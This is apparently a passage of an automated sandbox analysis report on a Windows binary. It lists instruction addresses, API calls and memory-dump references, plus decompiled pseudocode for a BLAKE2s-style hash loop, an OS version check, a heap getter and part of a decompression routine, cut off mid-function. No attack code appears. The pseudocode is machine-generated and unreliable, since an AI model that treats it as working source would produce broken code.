    0x008607f0
    0x00860806
    0x0086080d
    0x0086080f
    0x00860831
    0x00860839
    0x0086083c
    0x0086083c
    0x0086083e
    0x0086083e
    0x00860849
    0x0086084f
    0x00860854
    0x0086085b
    0x00860895
    0x008608a0
    0x008608a6
    0x008608a9
    0x008608ac
    0x008608b8
    0x008608c0
    0x0086085d
    0x00860860
    0x0086086c
    0x00860872
    0x00860878
    0x0086087b
    0x00860884
    0x00860884
    0x008608c3
    0x008608d1
    0x008608d7
    0x008608de
    0x008608e0
    0x008608e0
    0x008608e7
    0x008608e9
    0x008608e9
    0x008608f0
    0x008608f2
    0x008608f2
    0x008608f9
    0x008608fb
    0x008608fb
    0x00860902
    0x00860904
    0x00860904
    0x00860911
    0x00860914
    0x0086094b
    0x00860916
    0x00860916
    0x00860919
    0x00860944
    0x00860939
    0x00860939
    0x0086094d
    0x00860955
    0x00860958
    0x00860977
    0x0086097c
    0x0086097c
    0x0086097e
    0x00860983
    0x0086098f
    0x00860985
    0x00860988
    0x00860988
    0x00860994
    0x00860994
    0x0086095a
    0x0086095d
    0x0086096c
    0x00000000
    0x0086096c
    0x0086095f
    0x00860962
    0x00860964
    0x00860964
    0x00000000
    0x00860962
    0x0086091b
    0x0086091e
    0x00860934
    0x00000000
    0x00860934
    0x00860923
    0x00860925
    0x00860925
    0x00860923
    0x00000000
    0x00860914
    0x00860816
    0x00860824
    0x0086082c
    0x00000000
    0x0086082c
    0x0086081a
    0x0086081f
    0x0086081f
    0x00000000
    0x0086081a
    0x008607d7
    0x008607e5
    0x008607ed
    0x00000000
    0x008607ed
    0x008607db
    0x008607e0
    0x008607e0
    0x008607db

    APIs
    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0086069F,?,?,00000008,?,?,0086033F,00000000), ref: 008608D1
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ExceptionRaise
    • String ID:
    • API String ID: 3997070919-0
    • Opcode ID: 54cbc98082c33b4dd21d9eeb7f5ef59baf397a8f3b117229c79c1ddc1e6d2db2
    • Instruction ID: ed86f7568b679578e67cf162dcf327557c201645ec2d97b82b2bae6ad1714107
    • Opcode Fuzzy Hash: 54cbc98082c33b4dd21d9eeb7f5ef59baf397a8f3b117229c79c1ddc1e6d2db2
    • Instruction Fuzzy Hash: 0CB15D35510608DFD719CF28C48AB667BE1FF45364F2A8658E89ACF2A2C335E991CF44
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 81%
    			E00833FBD() {
    				void* _t230;
    				signed int* _t231;
    				intOrPtr _t240;
    				signed int _t245;
    				intOrPtr _t246;
    				signed int _t257;
    				intOrPtr _t258;
    				signed int _t269;
    				intOrPtr _t270;
    				signed int _t275;
    				signed int _t280;
    				signed int _t285;
    				signed int _t290;
    				signed int _t295;
    				intOrPtr _t296;
    				signed int _t301;
    				intOrPtr _t302;
    				signed int _t307;
    				intOrPtr _t308;
    				signed int _t313;
    				intOrPtr _t314;
    				signed int _t319;
    				signed int _t324;
    				signed int _t329;
    				signed int _t333;
    				signed int _t334;
    				signed int _t336;
    				signed int _t337;
    				signed int _t338;
    				signed int _t340;
    				signed int _t341;
    				signed int _t342;
    				signed int _t348;
    				signed int _t350;
    				signed int _t351;
    				signed int _t353;
    				signed int _t355;
    				signed int _t356;
    				signed int _t358;
    				signed int _t360;
    				signed int _t362;
    				signed int _t363;
    				signed int _t365;
    				signed int _t366;
    				signed int _t368;
    				signed int _t369;
    				signed int _t371;
    				signed int _t372;
    				signed int _t374;
    				signed int _t375;
    				intOrPtr _t376;
    				intOrPtr _t377;
    				signed int _t379;
    				signed int _t381;
    				intOrPtr _t383;
    				signed int _t385;
    				signed int _t386;
    				signed int _t388;
    				signed int _t389;
    				signed int _t390;
    				signed int _t391;
    				signed int _t392;
    				signed int _t393;
    				signed int _t394;
    				signed int _t395;
    				intOrPtr _t396;
    				signed int _t398;
    				intOrPtr _t399;
    				signed int _t407;
    				signed int _t409;
    				signed int _t411;
    				signed int _t412;
    				signed int _t414;
    				signed int _t418;
    				signed int _t420;
    				signed int _t422;
    				signed int _t423;
    				signed int _t425;
    				signed int _t427;
    				signed int _t429;
    				intOrPtr _t431;
    				signed int _t433;
    				intOrPtr _t434;
    				void* _t435;
    				void* _t436;
    				void* _t437;
    
    				_t377 =  *((intOrPtr*)(_t435 + 0xc0));
    				_t342 = 0x10;
    				 *((intOrPtr*)(_t435 + 0x18)) = 0x3c6ef372;
    				memcpy(_t435 + 0x8c,  *(_t435 + 0xd0), _t342 << 2);
    				_t436 = _t435 + 0xc;
    				_push(8);
    				_t230 = memcpy(_t436 + 0x4c,  *(_t377 + 0xf4), 0 << 2);
    				_t437 = _t436 + 0xc;
    				_t418 =  *_t230 ^ 0x510e527f;
    				_t231 =  *(_t377 + 0xfc);
    				_t407 =  *(_t230 + 4) ^ 0x9b05688c;
    				_t334 =  *(_t437 + 0x64);
    				 *(_t437 + 0x28) = 0x6a09e667;
    				 *(_t437 + 0x30) = 0xbb67ae85;
    				_t379 =  *_t231 ^ 0x1f83d9ab;
    				_t348 =  *(_t437 + 0x5c);
    				 *(_t437 + 0x44) = _t231[1] ^ 0x5be0cd19;
    				 *(_t437 + 0x3c) =  *(_t437 + 0x68);
    				 *(_t437 + 0x1c) =  *(_t437 + 0x60);
    				 *(_t437 + 0x2c) =  *(_t437 + 0x58);
    				 *(_t437 + 0x38) =  *(_t437 + 0x54);
    				 *(_t437 + 0x20) =  *(_t437 + 0x50);
    				 *((intOrPtr*)(_t437 + 0x10)) = 0;
    				 *((intOrPtr*)(_t437 + 0x48)) = 0;
    				_t427 =  *(_t437 + 0x44);
    				 *(_t437 + 0x14) =  *(_t437 + 0x4c);
    				_t240 =  *((intOrPtr*)(_t437 + 0x10));
    				 *(_t437 + 0x24) = 0xa54ff53a;
    				 *(_t437 + 0x40) = _t334;
    				 *(_t437 + 0x34) = _t348;
    				do {
    					_t37 = _t240 + 0x8623b0; // 0x3020100
    					_t350 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t37 & 0x000000ff) * 4)) + _t348;
    					 *(_t437 + 0x14) = _t350;
    					_t351 = _t350 ^ _t418;
    					asm("rol ecx, 0x10");
    					_t245 =  *(_t437 + 0x28) + _t351;
    					_t420 =  *(_t437 + 0x34) ^ _t245;
    					 *(_t437 + 0x28) = _t245;
    					_t246 =  *((intOrPtr*)(_t437 + 0x10));
    					asm("ror esi, 0xc");
    					 *(_t437 + 0x34) = _t420;
    					_t48 = _t246 + 0x8623b1; // 0x4030201
    					_t422 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t48 & 0x000000ff) * 4)) + _t420;
    					 *(_t437 + 0x14) = _t422;
    					_t423 = _t422 ^ _t351;
    					asm("ror esi, 0x8");
    					_t353 =  *(_t437 + 0x28) + _t423;
    					 *(_t437 + 0x28) = _t353;
    					asm("ror eax, 0x7");
    					 *(_t437 + 0x34) =  *(_t437 + 0x34) ^ _t353;
    					_t60 =  *((intOrPtr*)(_t437 + 0x10)) + 0x8623b2; // 0x5040302
    					_t355 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t60 & 0x000000ff) * 4)) +  *(_t437 + 0x1c);
    					 *(_t437 + 0x20) = _t355;
    					_t356 = _t355 ^ _t407;
    					asm("rol ecx, 0x10");
    					_t257 =  *(_t437 + 0x30) + _t356;
    					_t409 =  *(_t437 + 0x1c) ^ _t257;
    					 *(_t437 + 0x30) = _t257;
    					_t258 =  *((intOrPtr*)(_t437 + 0x10));
    					asm("ror edi, 0xc");
    					 *(_t437 + 0x1c) = _t409;
    					_t71 = _t258 + 0x8623b3; // 0x6050403
    					_t411 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t71 & 0x000000ff) * 4)) + _t409;
    					 *(_t437 + 0x20) = _t411;
    					_t412 = _t411 ^ _t356;
    					asm("ror edi, 0x8");
    					_t358 =  *(_t437 + 0x30) + _t412;
    					 *(_t437 + 0x30) = _t358;
    					asm("ror eax, 0x7");
    					 *(_t437 + 0x1c) =  *(_t437 + 0x1c) ^ _t358;
    					_t82 =  *((intOrPtr*)(_t437 + 0x10)) + 0x8623b4; // 0x7060504
    					_t336 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t82 & 0x000000ff) * 4)) + _t334;
    					_t360 = _t336 ^ _t379;
    					asm("rol ecx, 0x10");
    					_t269 =  *(_t437 + 0x18) + _t360;
    					_t381 =  *(_t437 + 0x40) ^ _t269;
    					 *(_t437 + 0x18) = _t269;
    					_t270 =  *((intOrPtr*)(_t437 + 0x10));
    					asm("ror edx, 0xc");
    					_t91 = _t270 + 0x8623b5; // 0x8070605
    					_t337 = _t336 +  *((intOrPtr*)(_t437 + 0x8c + ( *_t91 & 0x000000ff) * 4)) + _t381;
    					 *(_t437 + 0x38) = _t337;
    					_t338 = _t337 ^ _t360;
    					asm("ror ebx, 0x8");
    					_t275 =  *(_t437 + 0x18) + _t338;
    					 *(_t437 + 0x18) = _t275;
    					asm("ror edx, 0x7");
    					 *(_t437 + 0x40) = _t381 ^ _t275;
    					_t383 =  *((intOrPtr*)(_t437 + 0x10));
    					_t101 = _t383 + 0x8623b6; // 0x9080706
    					_t362 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t101 & 0x000000ff) * 4)) +  *(_t437 + 0x3c);
    					 *(_t437 + 0x2c) = _t362;
    					_t363 = _t362 ^ _t427;
    					asm("rol ecx, 0x10");
    					_t280 =  *(_t437 + 0x24) + _t363;
    					_t429 =  *(_t437 + 0x3c) ^ _t280;
    					 *(_t437 + 0x24) = _t280;
    					_t110 = _t383 + 0x8623b7; // 0xa090807
    					asm("ror ebp, 0xc");
    					_t385 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t110 & 0x000000ff) * 4)) + _t429;
    					 *(_t437 + 0x2c) = _t385;
    					_t386 = _t385 ^ _t363;
    					asm("ror edx, 0x8");
    					_t285 =  *(_t437 + 0x24) + _t386;
    					 *(_t437 + 0x24) = _t285;
    					asm("ror ebp, 0x7");
    					 *(_t437 + 0x3c) = _t429 ^ _t285;
    					_t431 =  *((intOrPtr*)(_t437 + 0x10));
    					_t121 = _t431 + 0x8623b8; // 0xb0a0908
    					_t365 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t121 & 0x000000ff) * 4)) +  *(_t437 + 0x1c);
    					 *(_t437 + 0x14) = _t365;
    					_t366 = _t365 ^ _t386;
    					asm("rol ecx, 0x10");
    					_t290 =  *(_t437 + 0x18) + _t366;
    					_t388 =  *(_t437 + 0x1c) ^ _t290;
    					 *(_t437 + 0x18) = _t290;
    					_t130 = _t431 + 0x8623b9; // 0xc0b0a09
    					asm("ror edx, 0xc");
    					_t433 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t130 & 0x000000ff) * 4)) + _t388;
    					 *(_t437 + 0x14) = _t433;
    					 *(_t437 + 0x4c) = _t433;
    					_t427 = _t433 ^ _t366;
    					asm("ror ebp, 0x8");
    					_t295 =  *(_t437 + 0x18) + _t427;
    					_t389 = _t388 ^ _t295;
    					 *(_t437 + 0x18) = _t295;
    					 *(_t437 + 0x74) = _t295;
    					_t296 =  *((intOrPtr*)(_t437 + 0x10));
    					asm("ror edx, 0x7");
    					 *(_t437 + 0x1c) = _t389;
    					 *(_t437 + 0x60) = _t389;
    					_t144 = _t296 + 0x8623ba; // 0xd0c0b0a
    					_t390 =  *(_t437 + 0x40);
    					_t368 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t144 & 0x000000ff) * 4)) + _t390;
    					 *(_t437 + 0x20) = _t368;
    					_t369 = _t368 ^ _t423;
    					asm("rol ecx, 0x10");
    					_t301 =  *(_t437 + 0x24) + _t369;
    					_t391 = _t390 ^ _t301;
    					 *(_t437 + 0x24) = _t301;
    					_t302 =  *((intOrPtr*)(_t437 + 0x10));
    					asm("ror edx, 0xc");
    					_t154 = _t302 + 0x8623bb; // 0xe0d0c0b
    					_t425 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t154 & 0x000000ff) * 4)) + _t391;
    					 *(_t437 + 0x20) = _t425;
    					 *(_t437 + 0x50) = _t425;
    					_t418 = _t425 ^ _t369;
    					asm("ror esi, 0x8");
    					_t307 =  *(_t437 + 0x24) + _t418;
    					_t392 = _t391 ^ _t307;
    					 *(_t437 + 0x24) = _t307;
    					 *(_t437 + 0x78) = _t307;
    					_t308 =  *((intOrPtr*)(_t437 + 0x10));
    					asm("ror edx, 0x7");
    					 *(_t437 + 0x40) = _t392;
    					 *(_t437 + 0x64) = _t392;
    					_t167 = _t308 + 0x8623bc; // 0xf0e0d0c
    					_t393 =  *(_t437 + 0x3c);
    					_t371 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t167 & 0x000000ff) * 4)) + _t393;
    					 *(_t437 + 0x38) = _t371;
    					_t372 = _t371 ^ _t412;
    					asm("rol ecx, 0x10");
    					_t313 =  *(_t437 + 0x28) + _t372;
    					_t394 = _t393 ^ _t313;
    					 *(_t437 + 0x28) = _t313;
    					_t314 =  *((intOrPtr*)(_t437 + 0x10));
    					asm("ror edx, 0xc");
    					_t177 = _t314 + 0x8623bd; // 0xe0f0e0d
    					_t414 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t177 & 0x000000ff) * 4)) + _t394;
    					 *(_t437 + 0x38) = _t414;
    					 *(_t437 + 0x54) = _t414;
    					_t407 = _t414 ^ _t372;
    					asm("ror edi, 0x8");
    					_t319 =  *(_t437 + 0x28) + _t407;
    					_t395 = _t394 ^ _t319;
    					 *(_t437 + 0x28) = _t319;
    					asm("ror edx, 0x7");
    					 *(_t437 + 0x3c) = _t395;
    					 *(_t437 + 0x68) = _t395;
    					_t396 =  *((intOrPtr*)(_t437 + 0x10));
    					 *(_t437 + 0x6c) = _t319;
    					_t190 = _t396 + 0x8623be; // 0xa0e0f0e
    					_t374 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t190 & 0x000000ff) * 4)) +  *(_t437 + 0x34);
    					 *(_t437 + 0x2c) = _t374;
    					_t375 = _t374 ^ _t338;
    					asm("rol ecx, 0x10");
    					_t324 =  *(_t437 + 0x30) + _t375;
    					_t340 =  *(_t437 + 0x34) ^ _t324;
    					 *(_t437 + 0x30) = _t324;
    					_t199 = _t396 + 0x8623bf; // 0x40a0e0f
    					asm("ror ebx, 0xc");
    					_t398 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t199 & 0x000000ff) * 4)) + _t340;
    					 *(_t437 + 0x2c) = _t398;
    					 *(_t437 + 0x58) = _t398;
    					_t379 = _t398 ^ _t375;
    					asm("ror edx, 0x8");
    					_t329 =  *(_t437 + 0x30) + _t379;
    					_t341 = _t340 ^ _t329;
    					 *(_t437 + 0x30) = _t329;
    					 *(_t437 + 0x70) = _t329;
    					asm("ror ebx, 0x7");
    					_t240 =  *((intOrPtr*)(_t437 + 0x10)) + 0x10;
    					 *(_t437 + 0x34) = _t341;
    					_t348 =  *(_t437 + 0x34);
    					 *(_t437 + 0x5c) = _t341;
    					_t334 =  *(_t437 + 0x40);
    					 *((intOrPtr*)(_t437 + 0x10)) = _t240;
    				} while (_t240 <= 0x90);
    				 *(_t437 + 0x84) = _t379;
    				_t399 =  *((intOrPtr*)(_t437 + 0xd0));
    				 *(_t437 + 0x88) = _t427;
    				_t434 =  *((intOrPtr*)(_t437 + 0x48));
    				 *(_t437 + 0x7c) = _t418;
    				 *(_t437 + 0x80) = _t407;
    				do {
    					_t376 =  *((intOrPtr*)(_t399 + 0xf4));
    					_t333 =  *(_t437 + _t434 + 0x6c) ^  *(_t376 + _t434) ^  *(_t437 + _t434 + 0x4c);
    					 *(_t376 + _t434) = _t333;
    					_t434 = _t434 + 4;
    				} while (_t434 < 0x20);
    				return _t333;
    			}

























































































    0x00833fc3
    0x00833fdd
    0x00833fe5
    0x00833fed
    0x00833fed
    0x00833ff9
    0x00833ffc
    0x00833ffc
    0x00834008
    0x0083400e
    0x00834014
    0x0083401a
    0x0083401e
    0x00834027
    0x00834030
    0x00834036
    0x0083403f
    0x00834049
    0x00834051
    0x00834059
    0x00834061
    0x00834069
    0x00834071
    0x00834075
    0x00834079
    0x0083407d
    0x00834081
    0x00834085
    0x0083408d
    0x00834091
    0x00834095
    0x00834095
    0x008340a9
    0x008340af
    0x008340b3
    0x008340b9
    0x008340bc
    0x008340be
    0x008340c0
    0x008340c4
    0x008340c8
    0x008340cb
    0x008340cf
    0x008340e3
    0x008340e9
    0x008340ed
    0x008340f3
    0x008340f6
    0x008340fa
    0x008340fe
    0x00834101
    0x0083410d
    0x0083411f
    0x00834125
    0x00834129
    0x0083412f
    0x00834132
    0x00834134
    0x00834136
    0x0083413a
    0x0083413e
    0x00834141
    0x00834145
    0x00834159
    0x0083415f
    0x00834163
    0x00834169
    0x0083416c
    0x00834170
    0x00834174
    0x00834177
    0x0083417f
    0x00834193
    0x0083419b
    0x008341a1
    0x008341a4
    0x008341a6
    0x008341a8
    0x008341ac
    0x008341b0
    0x008341b3
    0x008341c3
    0x008341c9
    0x008341cd
    0x008341d3
    0x008341d6
    0x008341da
    0x008341de
    0x008341e1
    0x008341e5
    0x008341e9
    0x008341fb
    0x00834201
    0x00834205
    0x0083420b
    0x0083420e
    0x00834210
    0x00834212
    0x00834216
    0x00834221
    0x0083422d
    0x00834233
    0x00834237
    0x0083423d
    0x00834240
    0x00834244
    0x00834248
    0x0083424b
    0x0083424f
    0x00834253
    0x00834265
    0x0083426b
    0x0083426f
    0x00834275
    0x00834278
    0x0083427a
    0x0083427c
    0x00834280
    0x0083428b
    0x00834297
    0x0083429d
    0x008342a1
    0x008342a5
    0x008342ab
    0x008342ae
    0x008342b0
    0x008342b2
    0x008342b6
    0x008342ba
    0x008342be
    0x008342c1
    0x008342c5
    0x008342c9
    0x008342d0
    0x008342dd
    0x008342df
    0x008342e3
    0x008342ed
    0x008342f0
    0x008342f2
    0x008342f4
    0x008342f8
    0x008342fc
    0x008342ff
    0x0083430f
    0x00834315
    0x00834319
    0x0083431d
    0x00834323
    0x00834326
    0x00834328
    0x0083432a
    0x0083432e
    0x00834332
    0x00834336
    0x00834339
    0x0083433d
    0x00834341
    0x00834348
    0x00834355
    0x0083435b
    0x0083435f
    0x00834365
    0x00834368
    0x0083436a
    0x0083436c
    0x00834370
    0x00834374
    0x00834377
    0x00834387
    0x0083438d
    0x00834391
    0x00834395
    0x0083439b
    0x0083439e
    0x008343a0
    0x008343a2
    0x008343a6
    0x008343a9
    0x008343ad
    0x008343b1
    0x008343b5
    0x008343b9
    0x008343cb
    0x008343d1
    0x008343d5
    0x008343db
    0x008343de
    0x008343e0
    0x008343e2
    0x008343e6
    0x008343f1
    0x008343fd
    0x008343ff
    0x00834403
    0x00834407
    0x00834409
    0x00834410
    0x00834412
    0x00834414
    0x00834418
    0x00834420
    0x00834423
    0x00834426
    0x0083442a
    0x0083442e
    0x00834432
    0x00834436
    0x0083443a
    0x00834445
    0x0083444c
    0x00834453
    0x0083445a
    0x0083445e
    0x00834462
    0x00834469
    0x00834469
    0x00834476
    0x0083447a
    0x0083447d
    0x00834480
    0x0083448f

    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID: gj
    • API String ID: 0-4203073231
    • Opcode ID: 0361acc4a6c77935b9d53b3e6e1e387fe0b6924fc07586457914975cb0960408
    • Instruction ID: 3bea9977f3d37aa1eb89a79b07d04f39206784b59ec25111ff5814de9275833b
    • Opcode Fuzzy Hash: 0361acc4a6c77935b9d53b3e6e1e387fe0b6924fc07586457914975cb0960408
    • Instruction Fuzzy Hash: 0FF1D3B2A083418FC748CF29D880A1AFBE2BFC8208F15896EF598D7711D734E9458F56
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0083AA39() {
    				struct _OSVERSIONINFOW _v280;
    				signed int _t6;
    				intOrPtr _t12;
    				intOrPtr _t13;
    
    				_t12 =  *0x86d020; // 0x2
    				if(_t12 != 0xffffffff) {
    					_t6 =  *0x8700f0; // 0xa
    					_t13 =  *0x8700f4; // 0x0
    				} else {
    					_v280.dwOSVersionInfoSize = 0x114;
    					GetVersionExW( &_v280);
    					_t12 = _v280.dwPlatformId;
    					_t6 = _v280.dwMajorVersion;
    					_t13 = _v280.dwMinorVersion;
    					 *0x86d020 = _t12;
    					 *0x8700f0 = _t6;
    					 *0x8700f4 = _t13;
    				}
    				if(_t12 != 2) {
    					return 0x501;
    				} else {
    					return (_t6 << 8) + _t13;
    				}
    			}







    0x0083aa3c
    0x0083aa4b
    0x0083aa89
    0x0083aa8e
    0x0083aa4d
    0x0083aa53
    0x0083aa5e
    0x0083aa64
    0x0083aa6a
    0x0083aa70
    0x0083aa76
    0x0083aa7c
    0x0083aa81
    0x0083aa81
    0x0083aa97
    0x00000000
    0x0083aa99
    0x00000000
    0x0083aa9c

    APIs
    • GetVersionExW.KERNEL32(?), ref: 0083AA5E
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Version
    • String ID:
    • API String ID: 1889659487-0
    • Opcode ID: 05760feeca3d48a4c53626b480103b90f8cb2c69fff688a2aa260cef2d3c1c59
    • Instruction ID: fdad9c7023fa35fcb0b9becd9be836bd67993f1ba8a2ff4fd1a51b6251f628f7
    • Opcode Fuzzy Hash: 05760feeca3d48a4c53626b480103b90f8cb2c69fff688a2aa260cef2d3c1c59
    • Instruction Fuzzy Hash: EFF06DB1D04619CBCB18CB18ED46AE473B5F798310F1002A9DA1983390E3B0A980DE92
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0085ACFC() {
    				signed int _t3;
    
    				_t3 = GetProcessHeap();
    				 *0x890874 = _t3;
    				return _t3 & 0xffffff00 | _t3 != 0x00000000;
    			}




    0x0085acfc
    0x0085ad04
    0x0085ad0c

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: HeapProcess
    • String ID:
    • API String ID: 54951025-0
    • Opcode ID: 3441536dea5849b6d6d044f4c293f2972cfa6c599184776cd02bf7e2195c87d5
    • Instruction ID: 5312bd7f18844c674ab05da170d94813cef422e5d82de627a5e9825f8005d933
    • Opcode Fuzzy Hash: 3441536dea5849b6d6d044f4c293f2972cfa6c599184776cd02bf7e2195c87d5
    • Instruction Fuzzy Hash: 00A00270B06601CF97409F35AF0930D3AE9BE46AD170EA1BAE609D6175EB74D4609F41
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E00845911(intOrPtr __esi) {
    				signed int _t314;
    				signed int _t315;
    				signed int _t316;
    				signed int _t318;
    				signed int _t319;
    				signed int _t320;
    				signed int _t321;
    				signed int _t322;
    				signed int _t324;
    				signed int _t325;
    				signed int _t326;
    				void* _t328;
    				intOrPtr _t333;
    				signed int _t347;
    				char _t356;
    				unsigned int _t359;
    				void* _t366;
    				intOrPtr _t371;
    				signed int _t381;
    				char _t390;
    				unsigned int _t391;
    				void* _t399;
    				intOrPtr _t400;
    				signed int _t403;
    				char _t412;
    				signed int _t414;
    				intOrPtr _t415;
    				signed int _t417;
    				signed int _t418;
    				signed int _t419;
    				signed int _t420;
    				signed int _t422;
    				signed int _t423;
    				signed short _t424;
    				signed int _t425;
    				signed int _t428;
    				signed int _t429;
    				signed int _t430;
    				signed int _t431;
    				signed int _t433;
    				signed int _t434;
    				signed short _t435;
    				unsigned int _t439;
    				unsigned int _t444;
    				signed int _t458;
    				signed int _t460;
    				signed int _t461;
    				signed int _t464;
    				signed int _t466;
    				signed int _t468;
    				signed int _t471;
    				signed int _t472;
    				signed int _t473;
    				intOrPtr* _t474;
    				signed int _t478;
    				signed int _t479;
    				intOrPtr _t483;
    				unsigned int _t486;
    				void* _t488;
    				signed int _t491;
    				signed int* _t493;
    				unsigned int _t496;
    				void* _t498;
    				signed int _t501;
    				signed int _t503;
    				signed int _t511;
    				void* _t514;
    				signed int _t517;
    				signed int _t519;
    				signed int _t522;
    				void* _t525;
    				signed int _t528;
    				signed int _t529;
    				intOrPtr* _t531;
    				void* _t532;
    				signed int _t535;
    				signed int _t537;
    				signed int _t539;
    				unsigned int _t546;
    				void* _t548;
    				signed int _t551;
    				unsigned int _t555;
    				void* _t557;
    				signed int _t560;
    				intOrPtr* _t562;
    				void* _t563;
    				signed int _t566;
    				void* _t569;
    				signed int _t572;
    				intOrPtr* _t575;
    				void* _t576;
    				signed int _t579;
    				void* _t582;
    				signed int _t585;
    				signed int _t586;
    				intOrPtr* _t591;
    				void* _t592;
    				signed int _t595;
    				signed int* _t598;
    				unsigned int _t600;
    				signed int _t603;
    				unsigned int _t605;
    				signed int _t608;
    				void* _t611;
    				signed int _t613;
    				signed int _t614;
    				void* _t615;
    				unsigned int _t617;
    				unsigned int _t621;
    				signed int _t624;
    				signed int _t625;
    				signed int _t626;
    				signed int _t627;
    				signed int _t628;
    				signed int _t629;
    				unsigned int _t632;
    				signed int _t634;
    				intOrPtr* _t637;
    				intOrPtr _t638;
    				signed int _t639;
    				signed int _t640;
    				signed int _t641;
    				signed int _t643;
    				signed int _t644;
    				signed int _t645;
    				char* _t646;
    				signed int _t648;
    				signed int _t649;
    				signed int _t651;
    				char* _t652;
    				intOrPtr* _t656;
    				signed int _t657;
    				void* _t658;
    				void* _t661;
    
    				L0:
    				while(1) {
    					L0:
    					_t638 = __esi;
    					_t598 = __esi + 0x7c;
    					while(1) {
    						L1:
    						 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
    						if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
    							goto L12;
    						} else {
    							_t637 = _t638 + 0x8c;
    						}
    						while(1) {
    							L3:
    							_t661 =  *_t643 -  *((intOrPtr*)(_t638 + 0x94)) - 1 +  *_t637;
    							if(_t661 <= 0 && (_t661 != 0 ||  *(_t638 + 8) <  *((intOrPtr*)(_t638 + 0x90)))) {
    								break;
    							}
    							L6:
    							if( *((char*)(_t638 + 0x9c)) != 0) {
    								L99:
    								_t415 = E0084484D(_t638);
    								L100:
    								return _t415;
    							}
    							L7:
    							_push(_t637);
    							_push(_t643);
    							_t415 = E00843446(_t638);
    							if(_t415 == 0) {
    								goto L100;
    							}
    							L8:
    							_push(_t638 + 0xa0);
    							_push(_t637);
    							_push(_t643);
    							_t415 = E008439F2(_t638);
    							if(_t415 != 0) {
    								continue;
    							} else {
    								goto L100;
    							}
    						}
    						L10:
    						_t458 = E00844495(_t638);
    						__eflags = _t458;
    						if(_t458 == 0) {
    							goto L99;
    						} else {
    							_t598 = _t638 + 0x7c;
    						}
    						L12:
    						_t483 =  *((intOrPtr*)(_t638 + 0x4b3c));
    						__eflags = (_t483 -  *_t598 &  *(_t638 + 0xe6dc)) - 0x1004;
    						if((_t483 -  *_t598 &  *(_t638 + 0xe6dc)) >= 0x1004) {
    							L18:
    							_t314 = E0083A591(_t643);
    							_t315 =  *(_t638 + 0x124);
    							_t600 = _t314 & 0x0000fffe;
    							__eflags = _t600 -  *((intOrPtr*)(_t638 + 0xa4 + _t315 * 4));
